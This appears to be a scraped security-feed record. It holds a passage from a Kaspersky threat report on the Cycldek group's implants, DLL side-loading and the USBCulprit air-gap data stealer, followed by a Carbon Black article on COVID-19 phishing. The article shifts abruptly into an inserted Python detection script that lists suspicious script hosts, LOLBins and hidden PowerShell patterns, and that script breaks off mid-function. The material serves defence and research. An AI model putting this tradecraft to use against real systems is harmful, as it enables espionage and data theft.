The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX that was typically leveraged by Chinese-speaking actors.\n * 2017 - the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as [described](<https://www.fortinet.com/blog/threat-research/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations.html>) by Fortinet.\n * 2018 - attacks have been witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky's Threat Intelligence Portal subscribers since October 2019, and will be the subject matter of this blog post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png>)\n\n**Figure 1: Timeline of Cycldek-attributed attacks.**\n\nMost attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as 'Royal Road') and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:\n\n * a legitimate signed application, usually related to an AV product, e.g. QcConsol - McAfee's QuickClean utility, and wsc_proxy.exe, Avast's remediation service.\n * a malicious DLL which is side-loaded by the former application.\n * an encrypted binary which gets decrypted and executed by the DLL.\n\nThe final payload that is run in memory is malware known as NewCore RAT. 
It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on [Github](<https://github.com/xdnice/PCShare>), allowing attackers to leverage and modify it for their needs.\n\nIn the case of Cycldek, the first public accounts of the group's usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.\n\n## Two implants, two clusters\n\nWhen inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.\n\nOur analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters. 
Notable characteristics of each cluster's implant are summarized in the table below.\n\n| | **BlueCore** | **RedCore** |\n|---|---|---|\n| Initial Infection Vector | RTF documents | Unknown |\n| Legitimate AV Utility | QcConcol.exe (McAfee's QuickClean utility) | wsc_proxy.exe (Avast's remediation application) |\n| Side-Loaded DLL | QcLite.dll | wsc.dll |\n| Payload Loader | stdole.tlb - contains PE loading shellcode and an encrypted BlueCore binary | msgsm64.acm - contains PE loading shellcode and an encrypted RedCore binary |\n| Injected Process | dllhst3g.exe | explorer.exe or winlogon.exe |\n| Configuration File | %APPDATA%\\desktop.ini | C:\\Documents and Settings\\All Users\\Documents\\desktop.ini or C:\\Documents and Settings\\All Users\\Documents\\desktopWOW64.ini |\n| Mutexes | UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} | UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6}, {F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB}, {E68DFA68-1132-4A32-ADE2-8C87F282C457}, {728264DE-3701-419B-84A4-2AD86B0C43A3}, {2BCD5B61-288C-44D5-BA0D-AAA00E9D2273}, {D9AE3AB0-D123-4F38-A9BE-898C8D49A214} |\n| Communicated URL Scheme | http://%s:%d/link?url=%s&enpl=%s&encd=%s | http://%s:%d/search.jsp?referer=%s&kw=%s&psid=%s or http://%s:%d/search.jsp?url=%s&referer=%s&kw=%s&psid=%s |\n\n**Table 1: Comparison of BlueCore and RedCore loader and implant traits.**\n\nAs demonstrated by the table, the variants share similar behavior. For example, both use DLL load order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution. 
By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and demonstrate identical code that may have been written by a shared developer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png>)\n\n**Figure 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore.**\n\nMoreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files 'stdole.tlb' and 'msgsm64.acm', contains a routine used to decrypt the implants' raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open source project, we estimate that they originate from a proprietary shared resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png>)\n\n**Figure 3: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters.**\n\nHaving said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:\n\n * _Keylogger_: RedCore records the title of the current foreground window (if it exists) and logs keystrokes every 10ms to an internal buffer of size 65530. 
When this buffer is filled, data from it is written to a file named 'RCoRes64.dat'. The data is encoded using a single-byte XOR with the key 0xFA.\n * _Device enumerator_: RedCore registers a window class intended to intercept window messages, with a callback that checks whether the inspected message was sent as a result of a DBT_DEVICEARRIVAL event. Such events signal the connection of a device to the system, in which case the callback verifies that this device is a new volume, and if it is, it sends a bitmap of the currently available logical drives to the C&C.\n * _RDP logger_: RedCore subscribes to an RDP connection event via ETW and notifies the C&C when it occurs. The code that handles this functionality is based on a little-known GitHub repository named [EventCop](<https://github.com/Mandar-Shinde/EventCop>), which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware contacts the C&C and informs it about the connection event.\n * _Proxy server_: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed to it from a source will be validated and passed on to the C&C in their original format.\n\nPerhaps the most notable difference between the two implants is the URL scheme they use to connect to and beacon their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure based on the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. 
All of the discovered domains were used to download further samples.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png>)\n\n_**Figure 4**: Difference in URL scheme used by each implant for C2 communication._\n\nThe conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and shifted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed being downloaded from each cluster of C&Cs, are outlined in the figures below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png>)\n\n_**Figure 5**: Volume of downloaded samples from C&Cs of each cluster by country and month, since mid-2018._\n\nFurthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated with a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both clusters. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix. 
All in all, this suggests the entities operating behind those clusters are sharing multiple resources \u2013 both code and infrastructure \u2013 and operating under a single organizational umbrella.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png>)\n\n_**Figure 6**: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix._\n\n## Info stealing and lateral movement toolset\n\nDuring the analysis, we were able to observe a variety of tools downloaded by both BlueCore and RedCore implants and used for either lateral movement in the compromised networks or information stealing from infected nodes. There were several types of these tools \u2013 some were proprietary and previously unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized by the attackers to complete specific tasks.\n\nAs in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Update (googleupdate.exe). These applications could be used to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.\n\nAs already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLBins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities. 
Examples include BrowserHistoryView (a NirSoft utility to obtain browsing history from common browsers), ProcDump (a Sysinternals tool used to dump process memory, possibly to obtain passwords from running processes), Nbtscan (a command line utility intended to scan IP networks for NetBIOS information) and PsExec (a Sysinternals tool used to execute commands remotely in the network, typically used for lateral movement).\n\nThe rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:\n\n * **Custom HDoor**: an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the [Naikon APT](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf>) that made use of the original tool. \nThe custom version used by Cycldek uses a small subset of the features, and the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts accessible through the local network but not connected to the internet.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png>)\n\n_**Figure 7**: Command line usage of the custom HDoor tool._\n\n * **JsonCookies**: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers. 
For this purpose, the sqlite3.dll library is downloaded from the C&C and used during execution to parse the database and generate a JSON file named 'FuckCookies.txt' containing the stolen cookie info. Entries in the file resemble this one:\n\n    {\n      \"domain\": \".google.com\",\n      \"id\": 1,\n      \"name\": \"NID\",\n      \"path\": \"/\",\n      \"value\": \"%VALUE%\"\n    }\n\n * **ChromePass**: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as outlined below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png>)\n\n_**Figure 8**: Command line usage of the ChromePass tool._\n\n## Formerly Unreported Malware: USBCulprit\n\nOne of the most notable examples in Cycldek's toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulprit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.\n\nDuring the time the malware was active, it showed little change in functionality. Based on Kaspersky's telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated into samples detected after 2017 is the capability to execute files with a given name from a connected USB drive. 
This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.\n\nAnother change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.\n\nThis loading scheme demonstrates that the actor behind it makes use of TTPs similar to those seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive, named 'wrapper.exe' (originally named 'PtUserSessionWrapper.exe' and belonging to Trend Micro), forces the execution of a malicious DLL named 'TmDbgLog.dll'. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png>)\n\n_**Figure 9**: USBCulprit's loading flow, as observed in samples after 2017._\n\nOnce USBCulprit is loaded into memory and executed, it operates in three phases:\n\n * **Bootstrap and data collection:** this stage prepares the environment for the malware's execution. Namely, it invokes two functions named 'CUSB::RegHideFileExt' and 'CUSB::RegHideFile' that modify registry keys to hide the extensions of files in Windows and ensure that hidden files are not shown to the user. 
It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware. Additionally, the malware makes a single scan to collect files it intends to steal using a function named 'CUSB::USBFindFile'. They are sought by enumerating several predefined directories to locate documents with one of the following extensions: *.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf. Every document found is logged in a file that lists all paths targeted for theft within a directory, such that every checked directory has a corresponding list file.\n\nThe chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a 'rar.exe' command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the previous step. The password for the archive is initialized at the beginning of the malware's execution, and is set to 'abcd!@#$' for most variants that we observed.\n\nIt is worth noting that the sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named 'time' within the directory from which the malware is executed. This file is expected to hold a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the 'time' file doesn't exist, it is created with the default value '20160601000000', corresponding to 01/06/2016 00:00:00.\n\n * **USB connection interception and data exfiltration/delivery**: when bootstrapping and data collection are completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. 
If at least one is of type DRIVE_REMOVABLE, further actions are taken.\n\nWhen a USB drive is connected, the malware verifies whether stolen data should be exfiltrated to it or whether it already contains existing data that should be copied locally. To do this, a directory named '$Recyc1e.Bin' is searched for on the drive and, if not found, is created. This directory is used as the target path for copying files to the drive or the source path for obtaining them from it.\n\nTo understand which direction of file copy should take place, a special marker file named '1.txt' is searched for locally. If it exists, the malware expects to find the aforementioned '$Recyc1e.Bin' directory on the drive with previously stolen document archives and attempts to copy it to the disk. Otherwise, the local archive files are copied from the disk to the same directory on the drive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png>)\n\n_**Figure 10**: USBCulprit's check for the 1.txt marker, indicating whether stolen files should be copied to the removable drive, or from it._\n\n * **Lateral movement and extension**: as part of the same loop mentioned above, the existence of another marker file named '2.txt' is checked locally to decide whether lateral movement should be conducted or not. Only if this file exists will the malware's binary be copied from its local path to the '$Recyc1e.Bin' directory. It's noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler. Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files on the USB drive and executing them. 
Examples of these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}. Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess, based on how they are handled, that they are used as extension modules or updated versions of the malware itself. The former is an archive that is extracted to a specific directory whose files are then enumerated and executed using an internal function named 'CUSB::runlist', while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.\n\nThe characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB drive and can help the attackers profile whether the machine on which the malware was executed is indeed part of a segregated network.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png>)\n\n_**Figure 11**: Commands used to profile the network connectivity of the compromised host._\n\nAnother explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around. 
This, along with the very specific files that the malware seeks as executable extensions and which could not be found as artifacts elsewhere in our investigation, points to a human factor being required to assist deployment of the malware in victim networks.\n\n## Conclusion\n\nCycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\n\nFurthermore, our analysis of the implants affiliated with the group gives an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. It is also worth noting that we observed multiple points where these entities did not work in a well-coordinated manner, for example, infecting machines with the BlueCore implant when they were already infected with RedCore.\n\nLastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased \u2013 it has merely evolved and changed shape, in terms of malware and actors. 
We continue to track the actor and report on its activity in our Threat Intelligence Portal.\n\nFor more information about Cycldek operations, contact us at: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n### Appendix - IOCs\n\n_Note_: a full list of IOCs can be found in our reports on the subject in Kaspersky's Threat Intelligence Portal.", "cvss3": {}, "published": "2020-06-03T10:00:32", "type": "securelist", "title": "Cycldek: Bridging the (air) gap", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "modified": "2020-06-03T10:00:32", "id": "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "href": "https://securelist.com/cycldek-bridging-the-air-gap/97157/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "carbonblack": [{"lastseen": "2020-03-19T21:36:32", "description": "The global COVID-19 pandemic is generating a substantial uptick in the production and delivery of Coronavirus themed malware. Due to a rapidly growing number of Indicators of Compromise (IOC)\u2019s, this report covers the key behaviors by aligning to the MITRE ATT&CK Framework. \n\n[_MITRE ATT&CK_](<https://attack.mitre.org/>)_ launched in 2018 is a security framework that describes the various stages through which an attack will generally progress. The intent of the framework is to provide \u201cbetter detection of post-compromise cyber adversary behavior\u201d_. 
_This framework is gaining increased adoption in the security community and VMware Carbon Black actively maps our products to this framework to provide added context for our customers._\n\nPhishing emails are the primary delivery vector; they carry malicious attachments that deliver payloads to infect victim machines. Some recently observed payloads are delivering trojans, backdoors, remote access trojan (RAT) functionality, cryptominers and botnet participation. In one variant that was analyzed, the malware was found to overlap with the APT41 (also referred to as WINNTI) threat group, which has traditionally been an APT actor based in China. Malicious functionality has also been observed in fake mobile apps, fake Coronavirus maps and fake VPN software. These recent observations show an increased overall risk to corporate as well as personal security, at a time when many countries and corporations are enforcing remote working. \n\n## **Background**\n\nThe COVID-19 global pandemic has created an unprecedented situation with far-reaching impacts on our daily lives. Many countries have encouraged or mandated social isolation, including working remotely, in an effort to contain the spread of the virus. Much is still unknown, leading to a climate of uncertainty. Unfortunately, during times of uncertainty and doubt, threat actors are ready to take advantage of the widespread desire to be informed. This is already happening with the Coronavirus. People and businesses who are already in a heightened state of emotion, and on overload with changes in all aspects of their lives, are now at risk from bad actors intent on stealing PII, sensitive information, payment details and more, simply by using luring tactics that feature Coronavirus themed malware. 
\n\nWhile this technique isn\u2019t new, history has proven that cyber crime often increases during times of heightened emotion, distraction and stress, such as certain religious or [festive](<https://www.bleepingcomputer.com/news/security/emotet-trojan-is-inviting-you-to-a-malicious-christmas-party/>) holidays, [elections](<https://www.darkreading.com/attacks-breaches/trump-themed-malware-dominating-threat-campaigns-this-election-season/d/d-id/1327211>), and even [Black Friday](<https://www.infosecurity-magazine.com/news/fake-black-friday-apps-cause/>) sales events. The actors exploit these challenging times to find avenues for distributing their malware. \n\nThis article aims to increase awareness of recently observed threats that are leveraging the COVID-19 pandemic by describing current examples in alignment with the MITRE ATT&CK Framework. MITRE ATT&CK has had a major impact on the cybersecurity industry due to its rapid adoption in the security community. Aligning to the MITRE ATT&CK Framework is important as there is a growing number of IOC\u2019s being produced daily. Historically, as in the case of Emotet, handling such large volumes of IOC\u2019s can become overwhelming for defenders. Understanding the behavioral patterns of the different types of threats allows for easier interpretation and proactive defense. \n\nThe intent is to raise awareness among customers, SOC teams, IR partners, MSSPs and all defenders in the InfoSec community; to aid them with the detection of, protection against and response to such malware, we will examine the types of attacks that appear to be most common.\n\nFor further information and resources pertaining to COVID-19, please refer to the VMware Carbon Black COVID-19: [Cybersecurity Community Resources](<https://www.carbonblack.com/2020/03/17/covid-19-cybersecurity-community-resources/>) page. 
\n\n## **Technical Analysis**\n\nIn the following section we will focus on the first two phases of the MITRE ATT&CK framework: **Initial Access** and **Execution**. We focus on these phases because we have observed the largest overlap from multiple actors that we are tracking. VMware Carbon Black\u2019s Threat Analysis Unit will continue to follow up with detailed analysis of individual actors and campaigns, digging deeper into the later stages of the attack.\n\nBefore we introduce these two tactic categories we would like to specifically highlight one of the most frequently leveraged techniques. [Masquerading (T1036)](<https://attack.mitre.org/techniques/T1036/>) occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. It is one of the key techniques employed in many of the observed threat types. While this may not come as a surprise, educating your end users, family and friends should be a priority during this unsettling time. Similar to campaigns that target religious or festive holidays, masquerading is the perfect tactic for bad actors, who have no regard for their victims. Their mission is clear, and masquerading helps them to evade defenses and get a few steps closer to achieving their goals. \n\n## **Initial Access**\n\nThis is the first tactic employed by bad actors who hope to compromise as many vulnerable machines as possible. While many people and businesses are trying to share legitimate information related to COVID-19, the sheer volume of information being communicated lends itself to the delivery of fake data sheets, infographics, links to tracking maps, as well as fake software. The intent is to catch the end user off guard in order to deliver the malware. 
Other tactics could also include [drive-by compromise (T1189)](<https://attack.mitre.org/techniques/T1189/>) or [supply chain compromise (T1195)](<https://attack.mitre.org/techniques/T1195/>). The rationale behind this is the rapid registration of coronavirus themed domain names that have appeared on [MalwarePatrol.net](<https://www.malwarepatrol.net/>). The count at the time of writing is currently over 5000 registered domain names. Using Coronavirus or COVID-19 themed domain names could easily trick legitimate users into visiting websites and becoming subject to drive-by or supply chain compromise. The list can be found [here](<https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.txt>). \n\n### [**Spearphishing Attachment - TID:T1193**](<https://attack.mitre.org/techniques/T1193/>)\n\nAttachments are a popular choice for obtaining initial infection. Observed attachment file types include, but are not limited to, files with the following extensions: ZIP, 7Z, TAR, RAR, JAR, VBS, IMG, GZ, EXE, ISO, SCR, RTF, PDF, DOC, XLS. Phishing emails may contain spoofed email headers and authentic-looking messaging to lure the victim into a false sense of security. Observed attachment names also include names that are attention grabbing in order to arouse enough curiosity for the end user to feel the need to open them. Phishing emails can contain spelling, grammar or formatting mistakes, as shown in the example below. With that said, more advanced threat actors will be particularly good at producing an authentic looking email message, as we will see later in this report. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/1-Phishing-email-example-1.png>) \n\n\n**Figure 1: Phishing email example containing malicious Word document attachment**\n\nA common technique is to create interesting content for malicious Microsoft Office related email attachments in order to convince the user to click on a link. 
This typically will invoke the underlying malicious code embedded within the document, which is usually a malicious MS Office macro using VBA code. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/2-Phishing-email-example-1-Word-macro.png>) \n\n\n**Figure 2: Typical end-user prompt to trigger embedded payload**\n\nIn our next example we see an ISO file included as an attachment. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/3-Phishing-email-example-2.png>) \n\n\n**Figure 3: Phishing email example containing malicious ISO file attachment**\n\nThe ISO attachment contains a SCR file which is actually a PE file. When executed, the PE file deploys RemCos, a prolific RAT which is being continually updated and sold on the Dark Web. The flow diagram below shows a visual representation of the underlying effects of opening this particular email attachment. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/4-CBD-Flow-SCR.png>) \n\n\n**Figure 4: Partial process flow diagram taken from VMware Carbon Black Endpoint Standard**\n\nIn the next example, a PDF attachment contains a clickable link which redirects the user to an external site hosting a PHP page. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/5-PDF-attachment-example-1.png>) \n\n\n**Figure 5: Example PDF Attachment containing clickable link**\n\nIf the user clicks the link within the PDF, they are presented with a fake Office365 landing page masquerading as a legitimate Office365 page. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/6-PDF-attachment-fake-Office-365-page.png>) \n\n\n**Figure 6: Fake Office365 landing page**\n\nAfter the user clicks on the \u201cdownload file\u201d button, they are presented with a fake Office365 login prompt which harvests any details inputted by the end user. 
\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/7-PDF-attachment-fake-Office-365-creds.png>) \n\n\n**Figure 7: Fake Office365 login prompt**\n\nIn the next example an attachment named **ALL UPDATED INFORMATION FROM CDC ON COVID-19 IN YOUR AREA.7z** contains an executable which, when opened, deploys **AgentTesla**. AgentTesla records keystrokes and other sensitive information and sends them to the operator over its C2 channel. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/8-7z-example.png>) \n\n\n**Figure 8: 7z file containing executable**\n\nAnother example uses an attachment named **AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe**, which, when opened, launches [RegAsm (T1121)](<https://attack.mitre.org/techniques/T1121/>) to deliver **Lokibot**, another popular and highly effective information stealer. The executable carries an embedded, obfuscated AutoIT script that deploys the main payload. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/9-AutoIT-obfuscated-script.png>) \n\n\n**Figure 9: Snippet of hex dump showing obfuscated AutoIT script embedded in PE file**\n\nAnother attachment named COVID-19.INFO.37842702.doc installs a trojan by using [PowerShell (T1086)](<https://attack.mitre.org/techniques/T1086/>) and CSCRIPT ([signed script proxy execution (T1216)](<https://attack.mitre.org/techniques/T1216/>)) to launch a VBS file, a common [scripting (T1064)](<https://attack.mitre.org/techniques/T1064/>) technique. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/10-trojan-example.png>) \n\n\n**Figure 10: Execution path displayed within VMware Carbon Black EDR**\n\n## Execution\n\n[User execution (T1204)](<https://attack.mitre.org/techniques/T1204/>) covers the moment an end user opens a phishing attachment or link. Other specific TTPs have been observed during the execution of Coronavirus themed payloads. 
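The attachment names and execution chains described above (a .doc that launches PowerShell and cscript to run a VBS file, a *_pdf.exe that launches RegAsm, archives and disk images that carry executables) are exactly what a detection engineer turns into rules. The Python below is an added example, not VMware Carbon Black's code or any product's query language. It runs two checks over constructed input: an attachment-name triage (risky and double extensions) and a process-tree triage over constructed endpoint telemetry lines whose `pid=/ppid=/image=/cmd=` layout is an assumption for this example, not a vendor format. It goes a little beyond the text by also flagging the csc.exe/cvtres.exe compile-after-delivery pair and hidden or encoded PowerShell, which the Execution section that follows describes.

```python
import re
from dataclasses import dataclass

# --- 1. attachment-name triage ---------------------------------------------
EXECUTABLE_EXT = {"exe", "scr", "vbs", "js", "jar", "com", "pif", "bat", "cmd", "ps1"}
CONTAINER_EXT = {"zip", "7z", "rar", "tar", "gz", "iso", "img"}
DOCUMENT_EXT = {"doc", "docm", "docx", "xls", "xlsm", "xlsx", "rtf", "pdf"}
# a document-type token glued to the stem right before an executable extension,
# e.g. "REPORT_pdf.exe" or "invoice.pdf.exe"
DOC_TOKEN = re.compile(r"[._-](pdf|docx?|xlsx?|rtf)$")

def triage_attachment(name):
    """Return the reasons an attachment file name is suspicious ([] = none)."""
    stem, _, ext = name.strip().lower().rpartition(".")
    reasons = []
    if ext in EXECUTABLE_EXT:
        reasons.append(f"executable attachment (.{ext})")
        if DOC_TOKEN.search(stem):
            reasons.append("document token before executable extension (masquerading)")
    elif ext in CONTAINER_EXT:
        reasons.append(f"container (.{ext}) that can carry an executable")
    elif ext in DOCUMENT_EXT:
        reasons.append(f"document (.{ext}) that can carry a macro or an exploit")
    return reasons

# --- 2. process-tree triage --------------------------------------------------
@dataclass
class Proc:
    pid: int
    ppid: int
    image: str      # full path as logged
    cmdline: str

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe", "mshta.exe"}
PROXY_EXEC = {"regasm.exe", "regsvcs.exe", "regsvr32.exe", "rundll32.exe", "installutil.exe"}
COMPILERS = {"csc.exe", "cvtres.exe"}
HIDDEN_PS = re.compile(r"-(w|windowstyle)\s+hidden|-(e|enc|encodedcommand)\s", re.I)
# constructed log layout: an assumption for this example, not a vendor format
LOG_RE = re.compile(r'pid=(\d+) ppid=(\d+) image="([^"]*)" cmd="([^"]*)"')

def basename(path):
    return re.split(r"[\\/]", path)[-1].lower()

def parse_log(lines):
    """Parse the constructed telemetry lines into {pid: Proc}."""
    procs = {}
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            pid, ppid, image, cmd = m.groups()
            procs[int(pid)] = Proc(int(pid), int(ppid), image, cmd)
    return procs

def ancestors(procs, pid):
    """Parent, grandparent, ... of pid as Proc objects (cycle-safe)."""
    seen, chain = {pid}, []
    pid = procs[pid].ppid
    while pid in procs and pid not in seen:
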